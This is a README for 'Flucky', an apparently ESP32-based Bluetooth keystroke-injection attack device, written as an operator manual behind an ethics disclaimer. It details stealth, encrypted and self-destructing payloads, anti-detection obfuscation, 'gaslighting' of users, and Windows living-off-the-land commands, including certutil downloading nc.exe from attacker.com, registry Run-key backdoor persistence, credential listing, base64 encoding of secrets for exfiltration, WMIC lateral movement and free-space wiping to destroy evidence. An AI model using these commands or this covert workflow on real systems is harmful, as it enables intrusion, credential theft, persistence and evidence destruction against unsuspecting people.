🦆 Flucky - Advanced Bluetooth HID Attack Platform

This readme is written by AI so sorry for poor language.

You may wanna skip part 0 {to Core Command System} it's ok but read ⚖️ STRICT ETHICAL USAGE POLICY

📚 Table of Contents

🧭 Getting Started

• The Creator's Manifesto & Ethical Foundation
• Why I Built Flucky – The Real Story
• STRICT Ethical Usage Policy
• Educational & Awareness Focus
• Getting Started the Right Way

⚙️ Core Platform Overview

• The Revolution in HID Attacks
• What Makes Flucky Different?
• Hardware Requirements
• Quick Start Guide

🎮 Part 1: Core Command System

• Command Structure
• Basic Device Management
• Script Management System
• Bluetooth Management
• Basic Keystroke Injection

🕶️ Part 2: Stealth, Encryption & Advanced Operations

• Stealth Operations
• Encryption & Security
• Obfuscation & Evasion
• Timing & Scheduling
• Advanced Payload Management
• Chaos Mode & Behavioral Randomization
• Button Management

🧠 Part 3: LOLBAS, Psychological Warfare & Real-World Operations

• LOLBAS Integration
• Gaslighting – Psychological Operations
• Real-World Operational Scenarios
• Advanced Operational Security
• Best Practices & Operational Guidelines
• The Future of HID Attacks

📋 Part 4: Essential Reference, Troubleshooting & Community

• Complete Command Reference Table
• Troubleshooting & Error Guide
• Advanced Configuration Guide
• Advanced Usage Patterns
• Security Best Practices
• Community & Contribution
• Learning Resources
• Final Words

---

💡 Tip: Use this index to jump directly to the section you need. All links are anchor-compatible with GitHub/GitLab markdown renderers.

Part 0: The Creator's Manifesto & Ethical Foundation

Built for Education, Designed for Awareness, Limited for Responsibility

"Great power requires greater responsibility. This is where that journey begins."

🎯 Why I Built Flucky - The Real Story

The Gap in the Market

For years, I watched some limitations:

• Missing psychological elements in security testing
• Poor operational security in available tools
• Limited real-world testing capabilities for awareness training

I didn't just want to make another ducky clone. I wanted to create something that would actually advance the field and help security professionals do their jobs better.

The Vision

Flucky represents what HID attack tools should be in 2025:

• Wireless and flexible
• Psychologically sophisticated
• Operationally secure
• Adaptable to modern defenses
• Educational and awareness-focused

🔒 Important Distribution Notice

Why Source Code Isn't Available

I'm distributing only the compiled .bin file intentionally: for some reasons

For Developers & Enthusiasts

I understand the desire for source code. While the full source isn't available:

• Feature requests are welcome and considered
• Bug reports are taken seriously and fixed promptly
• Educational inquiries about implementation are encouraged

⚖️ STRICT ETHICAL USAGE POLICY

Legal & Ethical Boundaries

🚫 ABSOLUTELY PROHIBITED:

• Unauthorized testing on systems you don't own
• Malicious attacks against individuals or organizations
• Use without explicit permission from system owners
• Any illegal activities whatsoever
• Harassment or intimidation of any kind

✅ APPROVED USAGE:

• Security awareness training with participant knowledge
• Authorized red team engagements with written permission
• Personal systems you own and control
• Educational environments with proper supervision
• Research with ethical oversight and approval

The Consequences of Misuse

Legal:

• Criminal prosecution under computer fraud laws
• Civil liability for damages caused
• Permanent career damage in security fields
• Loss of professional certifications and credentials

Moral:

• Erosion of trust in security community
• Harm to individuals and organizations
• Setback for legitimate security research
• Personal reputation destruction

Your Responsibility

By using Flucky, you agree to:

1. Use it only for legitimate, authorized security testing
2. Obtain written permission before any testing
3. Follow all applicable laws and regulations
4. Accept full responsibility for your actions
5. Report any vulnerabilities discovered responsibly

🎓 Educational & Awareness Focus

Why This Tool Matters for Security

Flucky is designed to address real security challenges:

For Defenders:

• Test detection capabilities for wireless HID attacks
• Train users to recognize subtle social engineering
• Validate security controls against modern techniques
• Understand the Bluetooth attack surface

For Red Teams:

• Conduct more realistic security assessments
• Test physical and wireless security controls
• Demonstrate real-world attack scenarios
• Improve security awareness training quality

Learning Objectives

When used properly, Flucky helps teach:

• Bluetooth security principles
• Social engineering awareness
• Physical security importance
• Incident response procedures
• User behavior monitoring

👨‍💻 About the Creator

Who I Am

James - [not] Security professional with 0 years of experience in:

• Red team operations and penetration testing
• Security tool development
• Awareness training and education
• Defensive security controls

My Motivation

I built Flucky because:

• I was tired of using outdated tools in modern environments
• I saw a gap in wireless HID attack capabilities
• I wanted to improve security awareness training quality
• I believe better tools make better security professionals

My Commitment

To the Community:

• Continue improving and maintaining Flucky
• Respond to legitimate bug reports and issues
• Consider serious feature requests
• Provide educational resources and guidance

To Ethical Security:

• Promote responsible disclosure and testing
• Support security education and awareness
• Contribute to making systems more secure
• Maintain high ethical standards

🤝 How to Support This Project

Immediate Actions You Can Take

⭐ Star This Repository

• Shows appreciation for the work
• Helps others discover the tool
• Motivates continued development
• Builds community credibility

🐛 Report Issues

• Found a bug? Tell me!
• Documentation errors or gaps?
• Have improvement suggestions?
• Open GitHub issues with details

💡 Suggest Improvements

• New features for legitimate use cases
• Documentation improvements
• Educational content ideas
• Integration suggestions

📢 Share Responsibly

• With other security professionals
• In educational contexts
• At security conferences and meetings
• Always with ethical guidelines

What Makes This Project Sustainable

Your support helps:

• Justify time spent on maintenance and updates
• Identify areas needing improvement
• Build a community of ethical users
• Create better security tools for everyone

🔍 Important Disclaimer

AI-Assisted Documentation Notice

This README was created with AI assistance. Please:

1. Verify all commands before use in production environments
2. Test thoroughly in lab settings first
3. Report any discrepancies between documentation and actual behavior
4. Understand that while I've reviewed everything, errors may exist

If You Find Issues

In documentation:

• Open a GitHub issue with the specific problem
• Suggest the corrected information
• Help improve it for everyone

In the tool:

• Document the exact steps to reproduce
• Note your hardware and environment
• Report via GitHub issues with details

🚀 Getting Started the Right Way

Your First Steps

1. Read and understand this entire documentation
2. Set up a lab environment with systems you own
3. Test basic functionality before complex operations
4. Develop your skills gradually and responsibly
5. Always get permission before any testing

Recommended Learning Path

Week 1: Basics

1. Hardware setup and flashing
2. Basic keystroke commands
3. Simple script creation

Week 2: Intermediate

1. Stealth and encryption features
2. Timing and scheduling
3. Button script management

Week 3: Advanced

1. LOLBAS techniques
2. Gaslighting for awareness
3. Operational security practices

Week 4: Mastery

1. Complex multi-stage operations
2. Custom feature development
3. Teaching others responsibly

🦆 Flucky - Advanced Bluetooth HID Attack Platform

The Ultimate Wireless HID Attack Tool - No Manual Pairing Required

"Why plug in when you can simply appear as a keyboard?"

🚀 The Revolution in HID Attacks

Why Flucky Exists - A Story of Necessity

I created Flucky to fix something:

• Physical access required - Plugging devices into target systems
• Limited stealth capabilities - Obvious indicators of compromise
• No psychological elements - Pure technical attacks without mind games

Flucky changes everything. This isn't just another Rubber Ducky clone - this is the evolution the security community desperately needed.

The Fundamental Breakthrough: Automatic BLE Connectivity

Traditional HID Attacks:

# Step 1: Physical access - plug device in
# Step 2: Hope the target doesn't notice
# Step 3: Execute basic payload
# Step 4: Pray you don't get caught

Flucky's Approach:

# Step 1: Be within Bluetooth range
# Step 2: Automatically appears as available keyboard
# Step 3: [Target connects thinking it's their device] or you connect within 10 sec.
# Step 4: Execute advanced, morphing payloads
# Step 5: Leave no trace, create maximum impact

🎯 What Makes Flucky Different?

1. 🚀 Automatic Bluetooth LE Connectivity

• No manual pairing required - Appears as standard HID keyboard
• Zero-click connection - Target simply selects from available devices
• Persistent presence - Stays available until connected
• Custom device naming - Disguise as legitimate peripherals

2. 🕶️ True Stealth Operations

• Complete output suppression - No serial logs, no LED indicators
• Encrypted payload storage - Scripts remain secure even if device captured
• Behavioral obfuscation - Random delays and execution patterns
• Self-destruct mechanisms - Automatic script erasure after use

3. 🧠 Psychological Warfare Capabilities

• Gaslighting features - Make users question reality
• Chaos mode - Unpredictable, random script execution
• Advanced obfuscation - Real-time typing manipulation
• Focus disruption - Steal attention at critical moments

4. ⚡ Enterprise-Grade Features

• LOLBAS integration - Living Off The Land Binary execution
• Scheduled payloads - Timed execution for optimal impact
• Dual trigger system - Multiple payloads on one device
• Morphing scripts - Self-modifying payloads that evade pattern detection

🔧 Hardware Requirements

Essential Components

• ESP32 Development Board (Any variant with BLE support)
• Micro-USB Cable for power and programming
• Breadboard/Jumper Wires for prototyping
• Enclosure (Optional but recommended for operational use)

GPIO Pin Configuration

Pin	Function	Description
GPIO 0	Primary Button	Main payload trigger (INPUT_PULLUP)
GPIO 2	Secondary Button	Alternate payload trigger (INPUT_PULLUP)
GPIO 22	Status LED	Visual feedback (OUTPUT)

Power Considerations

• USB Power: 5V via micro-USB (most common)
• Battery Power: 3.3V LiPo via appropriate connectors
• Current Draw: ~80mA during transmission, ~40mA idle

⚡ Quick Start Guide

Step 1: Flashing the Firmware

Using esptool.py:

# Install esptool
pip install esptool

# Flash the firmware (replace COM3 with your port)
esptool.py --port COM3 write_flash 0x1000 flucky_firmware.bin

# Verify the flash
esptool.py --port COM3 verify_flash 0x1000 flucky_firmware.bin

Using Arduino IDE:

1. Install ESP32 board support
2. Select correct board variant
3. Choose the appropriate COM port
4. Upload the compiled binary

Step 2: Initial Setup

1. Power on the device - LED should blink 3 times
2. Open Serial Monitor at 115200 baud rate
3. You should see:

   [CLEAR_SCREEN]
                .
                __
             <(o )___
              ( ._>  /
               `----'`
          ~~~~~~~~~~~~~~~~~
       ~~~~~~~~~~~~~~~~~~~~~~
   
   Welcome to Flucky! Made by James
   $ 
   

Step 3: Basic Testing

Test Bluetooth Connectivity:

STATUS

Expected output shows Bluetooth status and device information

Test Basic Keystroke:

STRING Hello Flucky!
ENTER

🎮 Core Command System

Command Structure

All Flucky commands follow a consistent pattern:

• Immediate execution - Commands run as soon as entered
• Case-sensitive - Commands must be uppercase as defined
• Parameter support - Many commands accept parameters
• Multi-command support - Use ; to separate multiple commands

Basic Device Management Commands

STATUS

Description: Comprehensive system status overview
Usage: STATUS
Output:

Flucky Status:
  Device Name: Flucky
  Bluetooth: Connected
  Button Trigger: Enabled
  Stealth Mode: Disabled
  Obfuscation: Disabled
  Advanced Obfuscation: Disabled
  Chaos Mode: Disabled
  Jitter: Disabled
  XOR Key: [Not Set]
  Button Script: [Not Defined]
  Button2 Script: [Not Defined]
  Easter Egg: [Not Hidden]
  Scheduled Payload: [Not Scheduled]
  Self-Destruct: Disabled
  Gaslight Profile: [Not Defined]
  Gaslight Active: No

rename <name>

Description: Change Bluetooth device name
Usage: rename Office Keyboard
Parameters: New device name (1-256 characters)
Effect: Immediately reinitializes BLE with new name

clear

Description: Clear serial terminal screen
Usage: clear
Effect: Clears display and re-shows welcome message

help

Description: Display comprehensive command help
Usage: help
Output: Complete list of all available commands with descriptions

Script Management System

Interactive Script Modes

script - Multi-line Script Input

$ script
Paste your script below. Send 'END' on a new line to finish:
------------------------
STRING Starting attack sequence
DELAY 1000
WIN r
DELAY 500
STRING cmd.exe
ENTER
DELAY 1000
STRING whoami
ENTER
END
------------------------
Executing script...
> STRING Starting attack sequence
> DELAY 1000
> WIN r
> DELAY 500
> STRING cmd.exe
> ENTER
> DELAY 1000
> STRING whoami
> ENTER
Script execution completed

BUTTON_DEF - Primary Button Script

$ BUTTON_DEF
Paste your button script below. Send 'END_BUTTON' on a new line to finish:
------------------------
STEALTH_ON
DELAY 2000
WIN r
STRING powershell -WindowStyle Hidden -Command "Start-Process cmd -WindowStyle Hidden"
ENTER
DELAY 3000
STRING systeminfo
ENTER
STEALTH_OFF
END_BUTTON
------------------------
Button script defined

BUTTON2_DEF - Secondary Button Script

$ BUTTON2_DEF  
Paste your second button script below. Send 'END_BUTTON2' on a new line to finish:
------------------------
STRING This is the secondary payload!
ENTER
DELAY 1000
STRING executed at [TIME]
ENTER
END_BUTTON2
------------------------
Second button script defined

Bluetooth Management

DISCONNECT

Description: Immediately terminate Bluetooth connection
Usage: DISCONNECT
Effect:

• Ends BLE advertising
• Cleans up Bluetooth stack
• Sets device to disconnected state
• LED blinks 3 times for confirmation

RECONNECT

Description: Reinitialize Bluetooth connectivity
Usage: RECONNECT
Effect:

• Calls DISCONNECT internally
• Reinitializes BLE with current device name
• Begins advertising immediately
• LED blinks 3 times for confirmation

⌨️ Basic Keystroke Injection

Single Key Presses

ENTER

Description: Press Enter key
Usage: ENTER
Equivalent: KEY_RETURN

SPACE

Description: Press Space bar
Usage: SPACE
Equivalent: ' ' (space character)

TAB

Description: Press Tab key
Usage: TAB
Equivalent: KEY_TAB

ESC / ESCAPE

Description: Press Escape key
Usage: ESC or ESCAPE
Equivalent: KEY_ESC

BREAK / PAUSE

Description: Press Break/Pause key
Usage: BREAK or PAUSE
Equivalent: KEY_MEDIA_PLAY_PAUSE

Modifier Key Combinations

WIN / META

Description: Press Windows/Meta key alone
Usage: WIN or META
Effect: Opens Start Menu (Windows) or Launcher (macOS/Linux)

WIN <key> / META <key>

Description: Windows/Meta key combination
Usage: WIN r or META r
Parameters: Single ASCII character
Examples:

• WIN r - Open Run dialog (Windows)
• META d - Show desktop (Windows)
• META l - Lock workstation (Windows)

CTRL <key>

Description: Control key combination
Usage: CTRL c
Parameters: Single ASCII character
Examples:

• CTRL c - Copy selected text
• CTRL v - Paste clipboard content
• CTRL a - Select all content
• CTRL z - Undo last action

ALT <key>

Description: Alt key combination
Usage: ALT tab
Parameters: Single ASCII character
Examples:

• ALT tab - Switch between applications
• ALT f4 - Close current window
• ALT space - Open window menu

SHIFT <key>

Description: Shift key combination
Usage: SHIFT a
Parameters: Single ASCII character
Effect: Produces uppercase character or symbol

CTRL ALT DELETE

Description: Three-key security combination
Usage: CTRL ALT DELETE
Effect: Opens security options screen (Windows)

Navigation Keys

Arrow Keys

• UPARROW - Press Up arrow key
• DOWNARROW - Press Down arrow key
• LEFTARROW - Press Left arrow key
• RIGHTARROW - Press Right arrow key

Document Navigation

• HOME - Press Home key (beginning of line)
• END - Press End key (end of line)
• PAGEUP - Press Page Up key
• PAGEDOWN - Press Page Down key

Function Keys

F<1-12>

Description: Press function keys F1 through F12
Usage: F1 through F12
Examples:

• F1 - Typically opens help
• F5 - Refresh page (browsers) or run code (IDEs)
• F11 - Toggle fullscreen mode
• F12 - Open developer tools (browsers)

Media Control Keys

VOLUMEUP / VOLUMEDOWN

Description: Adjust system volume
Usage: VOLUMEUP or VOLUMEDOWN
Effect: Increases/decreases system audio volume

MUTE

Description: Toggle audio mute
Usage: MUTE
Effect: Mutes/unmutes system audio

PLAY / PAUSE

Description: Control media playback
Usage: PLAY or PAUSE
Effect: Toggles play/pause state of media players

NEXTTRACK / PREVTRACK

Description: Skip media tracks
Usage: NEXTTRACK or PREVTRACK
Effect: Advances to next or previous track in playlists

String Input

STRING <text>

Description: Type arbitrary text strings
Usage: STRING Hello World!
Parameters: Any text (up to 256 characters per command)
Features:

• Supports full ASCII character set (32-126)
• Batch processing in 10-character chunks
• Configurable inter-character delays
• Advanced obfuscation compatibility
• Automatic non-ASCII character filtering

Examples:

STRING This is a test message!
STRING C:\Windows\System32\calc.exe
STRING powershell -Command "Get-Process"

Single Character Keys

<character>

Description: Press any single character key
Usage: a or A or 1 or @
Restrictions: Single ASCII character only
Examples:

• a - Press 'a' key
• A - Press 'A' key (with Shift)
• 1 - Press '1' key
• @ - Press '@' symbol (with Shift+2 on most layouts)

---

Continue to Part 2 for Advanced Features: Stealth, Encryption, and Obfuscation...

⭐ If Flucky makes your red team operations more effective, give us a star! ⭐

🦆 Flucky - Advanced Bluetooth HID Attack Platform

Part 2: Stealth, Encryption & Advanced Operations

Become a Ghost in the Machine - Advanced Stealth and Evasion Techniques

"The best attack is one they never detect"

🕶️ Stealth Operations

Complete Operational Security

Flucky's stealth capabilities transform your device from a visible tool into an invisible threat. When stealth matters, Flucky delivers.

STEALTH_ON

Description: Enable complete stealth mode
Usage: STEALTH_ON
Effects:

• ✅ Serial output completely disabled
• ✅ LED indicators turned off
• ✅ No visual feedback of any kind
• ✅ Silent operation only
• ✅ Command execution continues normally

Operational Impact:

• Device becomes completely invisible to visual inspection
• No logging of activities on serial monitor
• Perfect for covert operations and physical security testing
• Maintains full Bluetooth functionality

STEALTH_OFF

Description: Disable stealth mode
Usage: STEALTH_OFF
Effects:

• ✅ Serial output re-enabled
• ✅ LED indicators reactivated
• ✅ Normal visual feedback restored
• ✅ LED blinks twice for confirmation

Best Practices:

# Covert operation sequence
STEALTH_ON
BUTTON_DEF
DELAY 2000
STRING whoami > C:\temp\log.txt
ENTER
DELAY 1000
STRING ipconfig /all >> C:\temp\log.txt
ENTER
END_BUTTON
# Device now operates completely silently

Real-World Stealth Scenarios

Corporate Red Team:

STEALTH_ON
BUTTON_DEF
DELAY 3000
WIN r
STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\temp\recon.ps1
ENTER
END_BUTTON

Physical Security Assessment:

STEALTH_ON
# Device placed in target area
# No visual indicators when buttons pressed
# Complete deniability if discovered

🔐 Encryption & Security

Military-Grade Payload Protection

Flucky's encryption system ensures your payloads remain secure even if the device is captured or analyzed.

SET_XOR_KEY <key>

Description: Set XOR encryption key for all scripts
Usage: SET_XOR_KEY MySecretPassword123!
Parameters: Encryption key (1-256 characters)
Effects:

• ✅ All new scripts automatically encrypted with key
• ✅ Existing scripts re-encrypted with new key
• ✅ Encryption applies to:
  • Button scripts
  • Secondary button scripts
  • Easter egg scripts
  • Scheduled payloads
  • Gaslight profiles

Technical Details:

• Algorithm: XOR cipher with key cycling
• Key Space: 256-bit effective with long keys
• Performance: Minimal overhead on ESP32
• Security: Obfuscation against casual analysis

Usage Example:

# Set encryption key
SET_XOR_KEY CorporateRedTeam2024!

# Define encrypted script
BUTTON_DEF
STRING Encrypted payload content
ENTER
DELAY 1000
WIN r
STRING notepad.exe
ENTER
END_BUTTON

# Script is now stored encrypted on device

Encryption Management

View Encryption Status:

STATUS
# Look for: XOR Key: [Set]

Change Encryption Key:

# Old key: OldPassword123
# New key: NewPassword456
SET_XOR_KEY NewPassword456
# All scripts automatically re-encrypted

Remove Encryption:

# Set to empty key (not recommended for operational security)
SET_XOR_KEY  
# Warning: This will store scripts in plaintext!

Self-Destruct Mechanisms

SELF_DESTRUCT <count>

Description: Erase all scripts after specified number of executions
Usage: SELF_DESTRUCT 3
Parameters: Positive integer (number of executions before erase)
Effects:

• ✅ Counts script executions
• ✅ Erases ALL scripts when limit reached:
  • Button scripts
  • Secondary button scripts
  • Easter egg scripts
  • Scheduled payloads
  • Gaslight profiles
• ✅ Resets destruction counter after erase
• ✅ LED blinks 5 times when triggered

Operational Security:

# Mission with limited access
SELF_DESTRUCT 1
BUTTON_DEF
STRING One-time intelligence gathering
ENTER
DELAY 2000
STRING systeminfo > C:\temp\sysinfo.txt
ENTER
END_BUTTON
# Script erases itself after first use

Training Environment:

SELF_DESTRUCT 5
# Perfect for training - prevents accidental reuse
# of sensitive payloads in wrong environments

🎭 Obfuscation & Evasion

Basic Keystroke Obfuscation

OBFUSCATE_ON

Description: Enable basic keystroke obfuscation
Usage: OBFUSCATE_ON
Effects:

• ✅ Random extra keystrokes injected
• ✅ CAPS LOCK toggling at random intervals
• ✅ ALT key presses inserted randomly
• ✅ TAB key injections during typing
• ✅ Makes keystroke pattern analysis difficult

Technical Implementation:

• 33% chance of obfuscation per keystroke batch
• Random selection from 3 obfuscation methods
• Minimal impact on payload execution time
• Maintains payload functionality

OBFUSCATE_OFF

Description: Disable basic keystroke obfuscation
Usage: OBFUSCATE_OFF
Effects: Clean, predictable keystroke injection

Advanced Behavioral Obfuscation

ADV_OBFUSCATE_ON

Description: Enable advanced typing obfuscation
Usage: ADV_OBFUSCATE_ON
Effects:

• ✅ Random character insertion and deletion
• ✅ Cursor repositioning during typing
• ✅ HOME/END key usage to jump in text
• ✅ BACKSPACE/DELETE key simulation
• ✅ 20% chance per character for advanced obfuscation

Advanced Techniques:

• Character Flooding: Insert 1-3 random characters then delete them
• Cursor Jumping: Move cursor to random positions in text
• Multi-direction Editing: Simulate real human typing errors
• Context-aware: Maintains overall payload integrity

ADV_OBFUSCATE_OFF

Description: Disable advanced obfuscation
Usage: ADV_OBFUSCATE_OFF

Obfuscation Strategy Examples

Basic Obfuscation for General Use:

OBFUSCATE_ON
STRING This text will have random keystrokes injected
ENTER

Advanced Obfuscation for High-Security Environments:

ADV_OBFUSCATE_ON
STRING This text will appear to be typed by a human with erratic behavior
ENTER

Combined Obfuscation Layers:

OBFUSCATE_ON
ADV_OBFUSCATE_ON
STRING Maximum obfuscation - both basic and advanced techniques active
ENTER

⏰ Timing & Scheduling

Delay Management

DELAY <ms>

Description: Insert specific delay in milliseconds
Usage: DELAY 5000
Parameters: Positive integer (milliseconds to wait)
Validation: Ensures valid positive integer provided

Usage Examples:

# Wait for system to settle after connection
DELAY 3000

# Wait for application to load
STRING notepad.exe
ENTER
DELAY 2000

# Wait for network connection
STRING ping 8.8.8.8
ENTER
DELAY 5000

DEFAULTDELAY <ms> / DEFAULT_DELAY <ms>

Description: Set default delay between all commands
Usage: DEFAULTDELAY 500
Parameters: Positive integer (milliseconds between commands)
Scope: Affects all subsequent command executions

Script Optimization:

# Set conservative timing for reliable execution
DEFAULTDELAY 1000
BUTTON_DEF
WIN r
STRING cmd.exe
ENTER
STRING whoami
ENTER
STRING ipconfig
ENTER
END_BUTTON

Jitter & Randomization

SET_JITTER <ms>

Description: Set maximum random delay range
Usage: SET_JITTER 500
Parameters: Positive integer (0-N ms random delay range)
Effect: Adds 0 to specified milliseconds of random delay

JITTER_ON

Description: Enable jitter randomization
Usage: JITTER_ON
Requirement: SET_JITTER must be configured first

JITTER_OFF

Description: Disable jitter randomization
Usage: JITTER_OFF

Jitter Implementation Example:

# Configure jitter for unpredictable timing
SET_JITTER 1000
JITTER_ON

BUTTON_DEF
STRING Command execution with random delays between 0-1000ms
ENTER
DELAY 2000  # Fixed 2-second delay
STRING Another command with jitter after it
ENTER
END_BUTTON

Payload Scheduling

SCHEDULE <ms> <script>

Description: Schedule payload execution for future time
Usage: SCHEDULE 30000 WIN r
Parameters:

• <ms>: Milliseconds to wait before execution
• <script>: Command or script to execute

Advanced Scheduling:

# Schedule multiple commands
SCHEDULE 60000 "WIN r; STRING notepad.exe; ENTER"

# Schedule complex script
SCHEDULE 120000 "STRING Scheduled payload execution; ENTER; DELAY 1000; STRING Completed; ENTER"

# Schedule with encryption (if XOR key set)
SCHEDULE 30000 "STRING This payload is encrypted and scheduled"

RUN_SCHEDULE

Description: Execute scheduled payload immediately
Usage: RUN_SCHEDULE
Use Case: Manual triggering of scheduled payloads

Operational Scheduling Examples:

Business Hours Activation:

# Schedule for 9 AM next day (calculate milliseconds)
SCHEDULE 57600000 BUTTON_SCRIPT_PRIMARY

Staggered Attack Timeline:

SCHEDULE 30000 "STRING Phase 1: Initial reconnaissance"
SCHEDULE 60000 "STRING Phase 2: Privilege escalation"  
SCHEDULE 90000 "STRING Phase 3: Persistence establishment"

🔄 Advanced Payload Management

Command Repetition

REPEAT <count>

Description: Repeat last command specified number of times
Usage: REPEAT 5
Parameters: Positive integer (number of repetitions)
Requirements:

• Valid previous command must exist
• Bluetooth connection active
• Positive repetition count

Usage Examples:

# Simple key repetition
STRING Hello
ENTER
REPEAT 3  # Types "Hello" and presses Enter 3 more times

# Complex command repetition  
WIN r
STRING cmd.exe
ENTER
DELAY 2000
STRING echo "This is a test"
ENTER
# Now this entire sequence can be repeated

Payload Morphing

MORPH_PAYLOAD

Description: Randomly shuffle execution order of button script
Usage: MORPH_PAYLOAD
Effects:

• ✅ Randomizes line order in button script
• ✅ Maintains individual command integrity
• ✅ Re-encrypts script with current XOR key
• ✅ Creates unpredictable execution patterns

Technical Details:

• Uses Fisher-Yates shuffle algorithm
• Processes up to 50 script lines
• Maintains script functionality despite order changes
• Particularly effective against behavioral analysis

Morphing Example:

# Original script
BUTTON_DEF
STRING Step 1: Initialization
ENTER
DELAY 1000
STRING Step 2: Execution
ENTER
DELAY 1000  
STRING Step 3: Cleanup
ENTER
END_BUTTON

# After MORPH_PAYLOAD
# Execution order randomized, e.g.:
# Step 2, Step 3, Step 1
# Different every time morph is called

Easter Egg System

HIDE_EGG <script>

Description: Store hidden payload script
Usage: HIDE_EGG "STRING Secret payload; ENTER"
Parameters: Script content (up to 4096 characters)
Security: Automatically encrypted if XOR key set

ACTIVATE_EGG

Description: Execute hidden easter egg payload
Usage: ACTIVATE_EGG
Use Cases:

• Secret backdoor activation
• Emergency cleanup procedures
• Special privilege escalation
• Humorous or creative payloads

Covert Operations Example:

# Hide emergency cleanup script
HIDE_EGG "STRING Removing evidence...; ENTER; DELAY 1000; STRING Evidence removed; ENTER"

# Normal operation continues...
BUTTON_DEF
STRING Normal reconnaissance script
ENTER
END_BUTTON

# Later, activate hidden egg
ACTIVATE_EGG

🎪 Chaos Mode & Behavioral Randomization

Unpredictable Execution

CHAOS_ON

Description: Enable random script execution mode
Usage: CHAOS_ON
Effects:

• ✅ Randomly executes button script at intervals
• ✅ Interval: 5-15 seconds between executions
• ✅ Creates unpredictable system behavior
• ✅ Excellent for stress testing and awareness training

CHAOS_OFF

Description: Disable chaos mode
Usage: CHAOS_OFF

Chaos Mode Implementation:

# Define a disruptive but non-destructive script
BUTTON_DEF
STRING Chaos testing in progress...
ENTER
DELAY 500
PRESS CAPS_LOCK
DELAY 500
STRING System stability test
ENTER
END_BUTTON

# Enable chaos mode
CHAOS_ON
# Script now executes randomly every 5-15 seconds

Real-World Chaos Scenarios

Security Awareness Training:

CHAOS_ON
BUTTON_DEF
STRING Security Alert: Unusual activity detected
ENTER  
DELAY 2000
STRING Please contact IT immediately
ENTER
END_BUTTON

System Stress Testing:

CHAOS_ON
BUTTON_DEF
WIN r
STRING calc.exe
ENTER
DELAY 1000
STRING 12345 * 67890
ENTER
END_BUTTON

🔧 Button Management

Trigger Control

ENABLE_BUTTON

Description: Enable physical button triggers
Usage: ENABLE_BUTTON
Effect: Both GPIO 0 and GPIO 2 buttons become active

DISABLE_BUTTON

Description: Disable physical button triggers
Usage: DISABLE_BUTTON
Effect: Buttons become inactive, preventing accidental activation

Operational Security:

# Transport mode - buttons disabled
DISABLE_BUTTON
# Device can be safely transported
# No risk of accidental payload execution

# Operational mode - buttons enabled  
ENABLE_BUTTON
# Ready for mission execution

Dual-Button Strategy

Primary Button (GPIO 0):

• Main operational payload
• Comprehensive attack scripts
• Multi-stage execution sequences

Secondary Button (GPIO 2):

• Quick reconnaissance
• Emergency procedures
• Alternative persistence methods
• Decoy activities

Example Configuration:

# Primary - Comprehensive attack
BUTTON_DEF
STEALTH_ON
DELAY 2000
STRING Main operational payload...
ENTER
# ... comprehensive script ...
END_BUTTON

# Secondary - Quick intelligence
BUTTON2_DEF  
STRING Quick system info...
ENTER
DELAY 1000
STRING hostname && whoami
ENTER
END_BUTTON2

---

Continue to Part 3 for LOLBAS Integration, Gaslighting, and Real-World Scenarios...

🚀 Flucky's stealth capabilities make traditional HID tools look like neon signs in a dark room

🦆 Flucky - Advanced Bluetooth HID Attack Platform

Part 3: LOLBAS, Psychological Warfare & Real-World Operations

From Fileless Execution to Mind Games - The Complete Operator's Toolkit

"Why break in when you can live off the land? Why attack systems when you can influence minds?"

🏴‍☠️ LOLBAS Integration - Living Off The Land

The Philosophy of Fileless Operations

LOLBAS (Living Off The Land Binaries and Scripts) represents the pinnacle of modern tradecraft. Instead of dropping malware, use what's already there. Flucky integrates comprehensive LOLBAS capabilities to make your operations virtually undetectable.

System Binary Exploitation

LOLBAS_CIPHER <param>

Description: Execute cipher.exe for secure deletion or disk operations
Usage: LOLBAS_CIPHER /w:C:\\
Common Parameters:

• /w:C:\\ - Wipe free space on C: drive (data destruction)
• /w:D:\\folder - Wipe specific directory free space

Operational Use:

# Evidence destruction
LOLBAS_CIPHER /w:C:\\temp
# Overwrites free space in temp directory

LOLBAS_CMD <param>

Description: Execute commands via cmd.exe
Usage: LOLBAS_CMD "whoami && ipconfig"
Advantages:

• Bypasses some application whitelisting
• Inherits cmd.exe's trusted status
• Supports batch operations

Examples:

# Basic system reconnaissance
LOLBAS_CMD "systeminfo | findstr /B /C:"OS Name" /C:"OS Version""

# Network discovery
LOLBAS_CMD "arp -a && netstat -ano"

# User information gathering
LOLBAS_CMD "net user && whoami /priv"

LOLBAS_CMDKEY <param>

Description: Manage stored credentials with cmdkey.exe
Usage: LOLBAS_CMDKEY /list
Operational Value:

• List stored Windows credentials
• Create new credential entries
• Dump authentication tokens

Credential Operations:

# List all stored credentials
LOLBAS_CMDKEY /list

# Create persistent credential (example)
LOLBAS_CMDKEY /add:targetname /user:username /pass:password

LOLBAS_CERTUTIL <param>

Description: Leverage certutil.exe for file operations
Usage: LOLBAS_CERTUTIL -urlcache -split -f http://example.com/file.exe C:\\temp\\file.exe
Capabilities:

• File download without external tools
• Base64 encoding/decoding
• File integrity checking

File Transfer Operations:

# Download file from web server
LOLBAS_CERTUTIL -urlcache -split -f http://attacker.com/tools/nc.exe C:\\Windows\\Temp\\nc.exe

# Encode file to base64 (exfiltration prep)
LOLBAS_CERTUTIL -encode C:\\secrets.txt C:\\encoded.txt

# Decode base64 file
LOLBAS_CERTUTIL -decode C:\\encoded.txt C:\\decoded.txt

LOLBAS_REG <param>

Description: Registry manipulation via reg.exe
Usage: LOLBAS_REG add "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "Backdoor" /t REG_SZ /d "C:\\malware.exe"
Persistence Techniques:

• Run key modifications
• Service configuration changes
• Policy alterations

Persistence Examples:

# Add to Run key for persistence
LOLBAS_REG add "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\\Windows\\Temp\\payload.exe"

# Query current Run entries
LOLBAS_REG query "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"

# Delete persistence entry
LOLBAS_REG delete "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "WindowsUpdate" /f

LOLBAS_WMIC <param>

Description: Windows Management Instrumentation commands
Usage: LOLBAS_WMIC process call create "notepad.exe"
Advanced Capabilities:

• Process creation and management
• System information gathering
• Remote command execution
• Event log manipulation

WMIC Operations:

# Create process remotely (lateral movement)
LOLBAS_WMIC /node:192.168.1.100 process call create "cmd.exe /c whoami > C:\\output.txt"

# List all processes
LOLBAS_WMIC process get name,processid,commandline

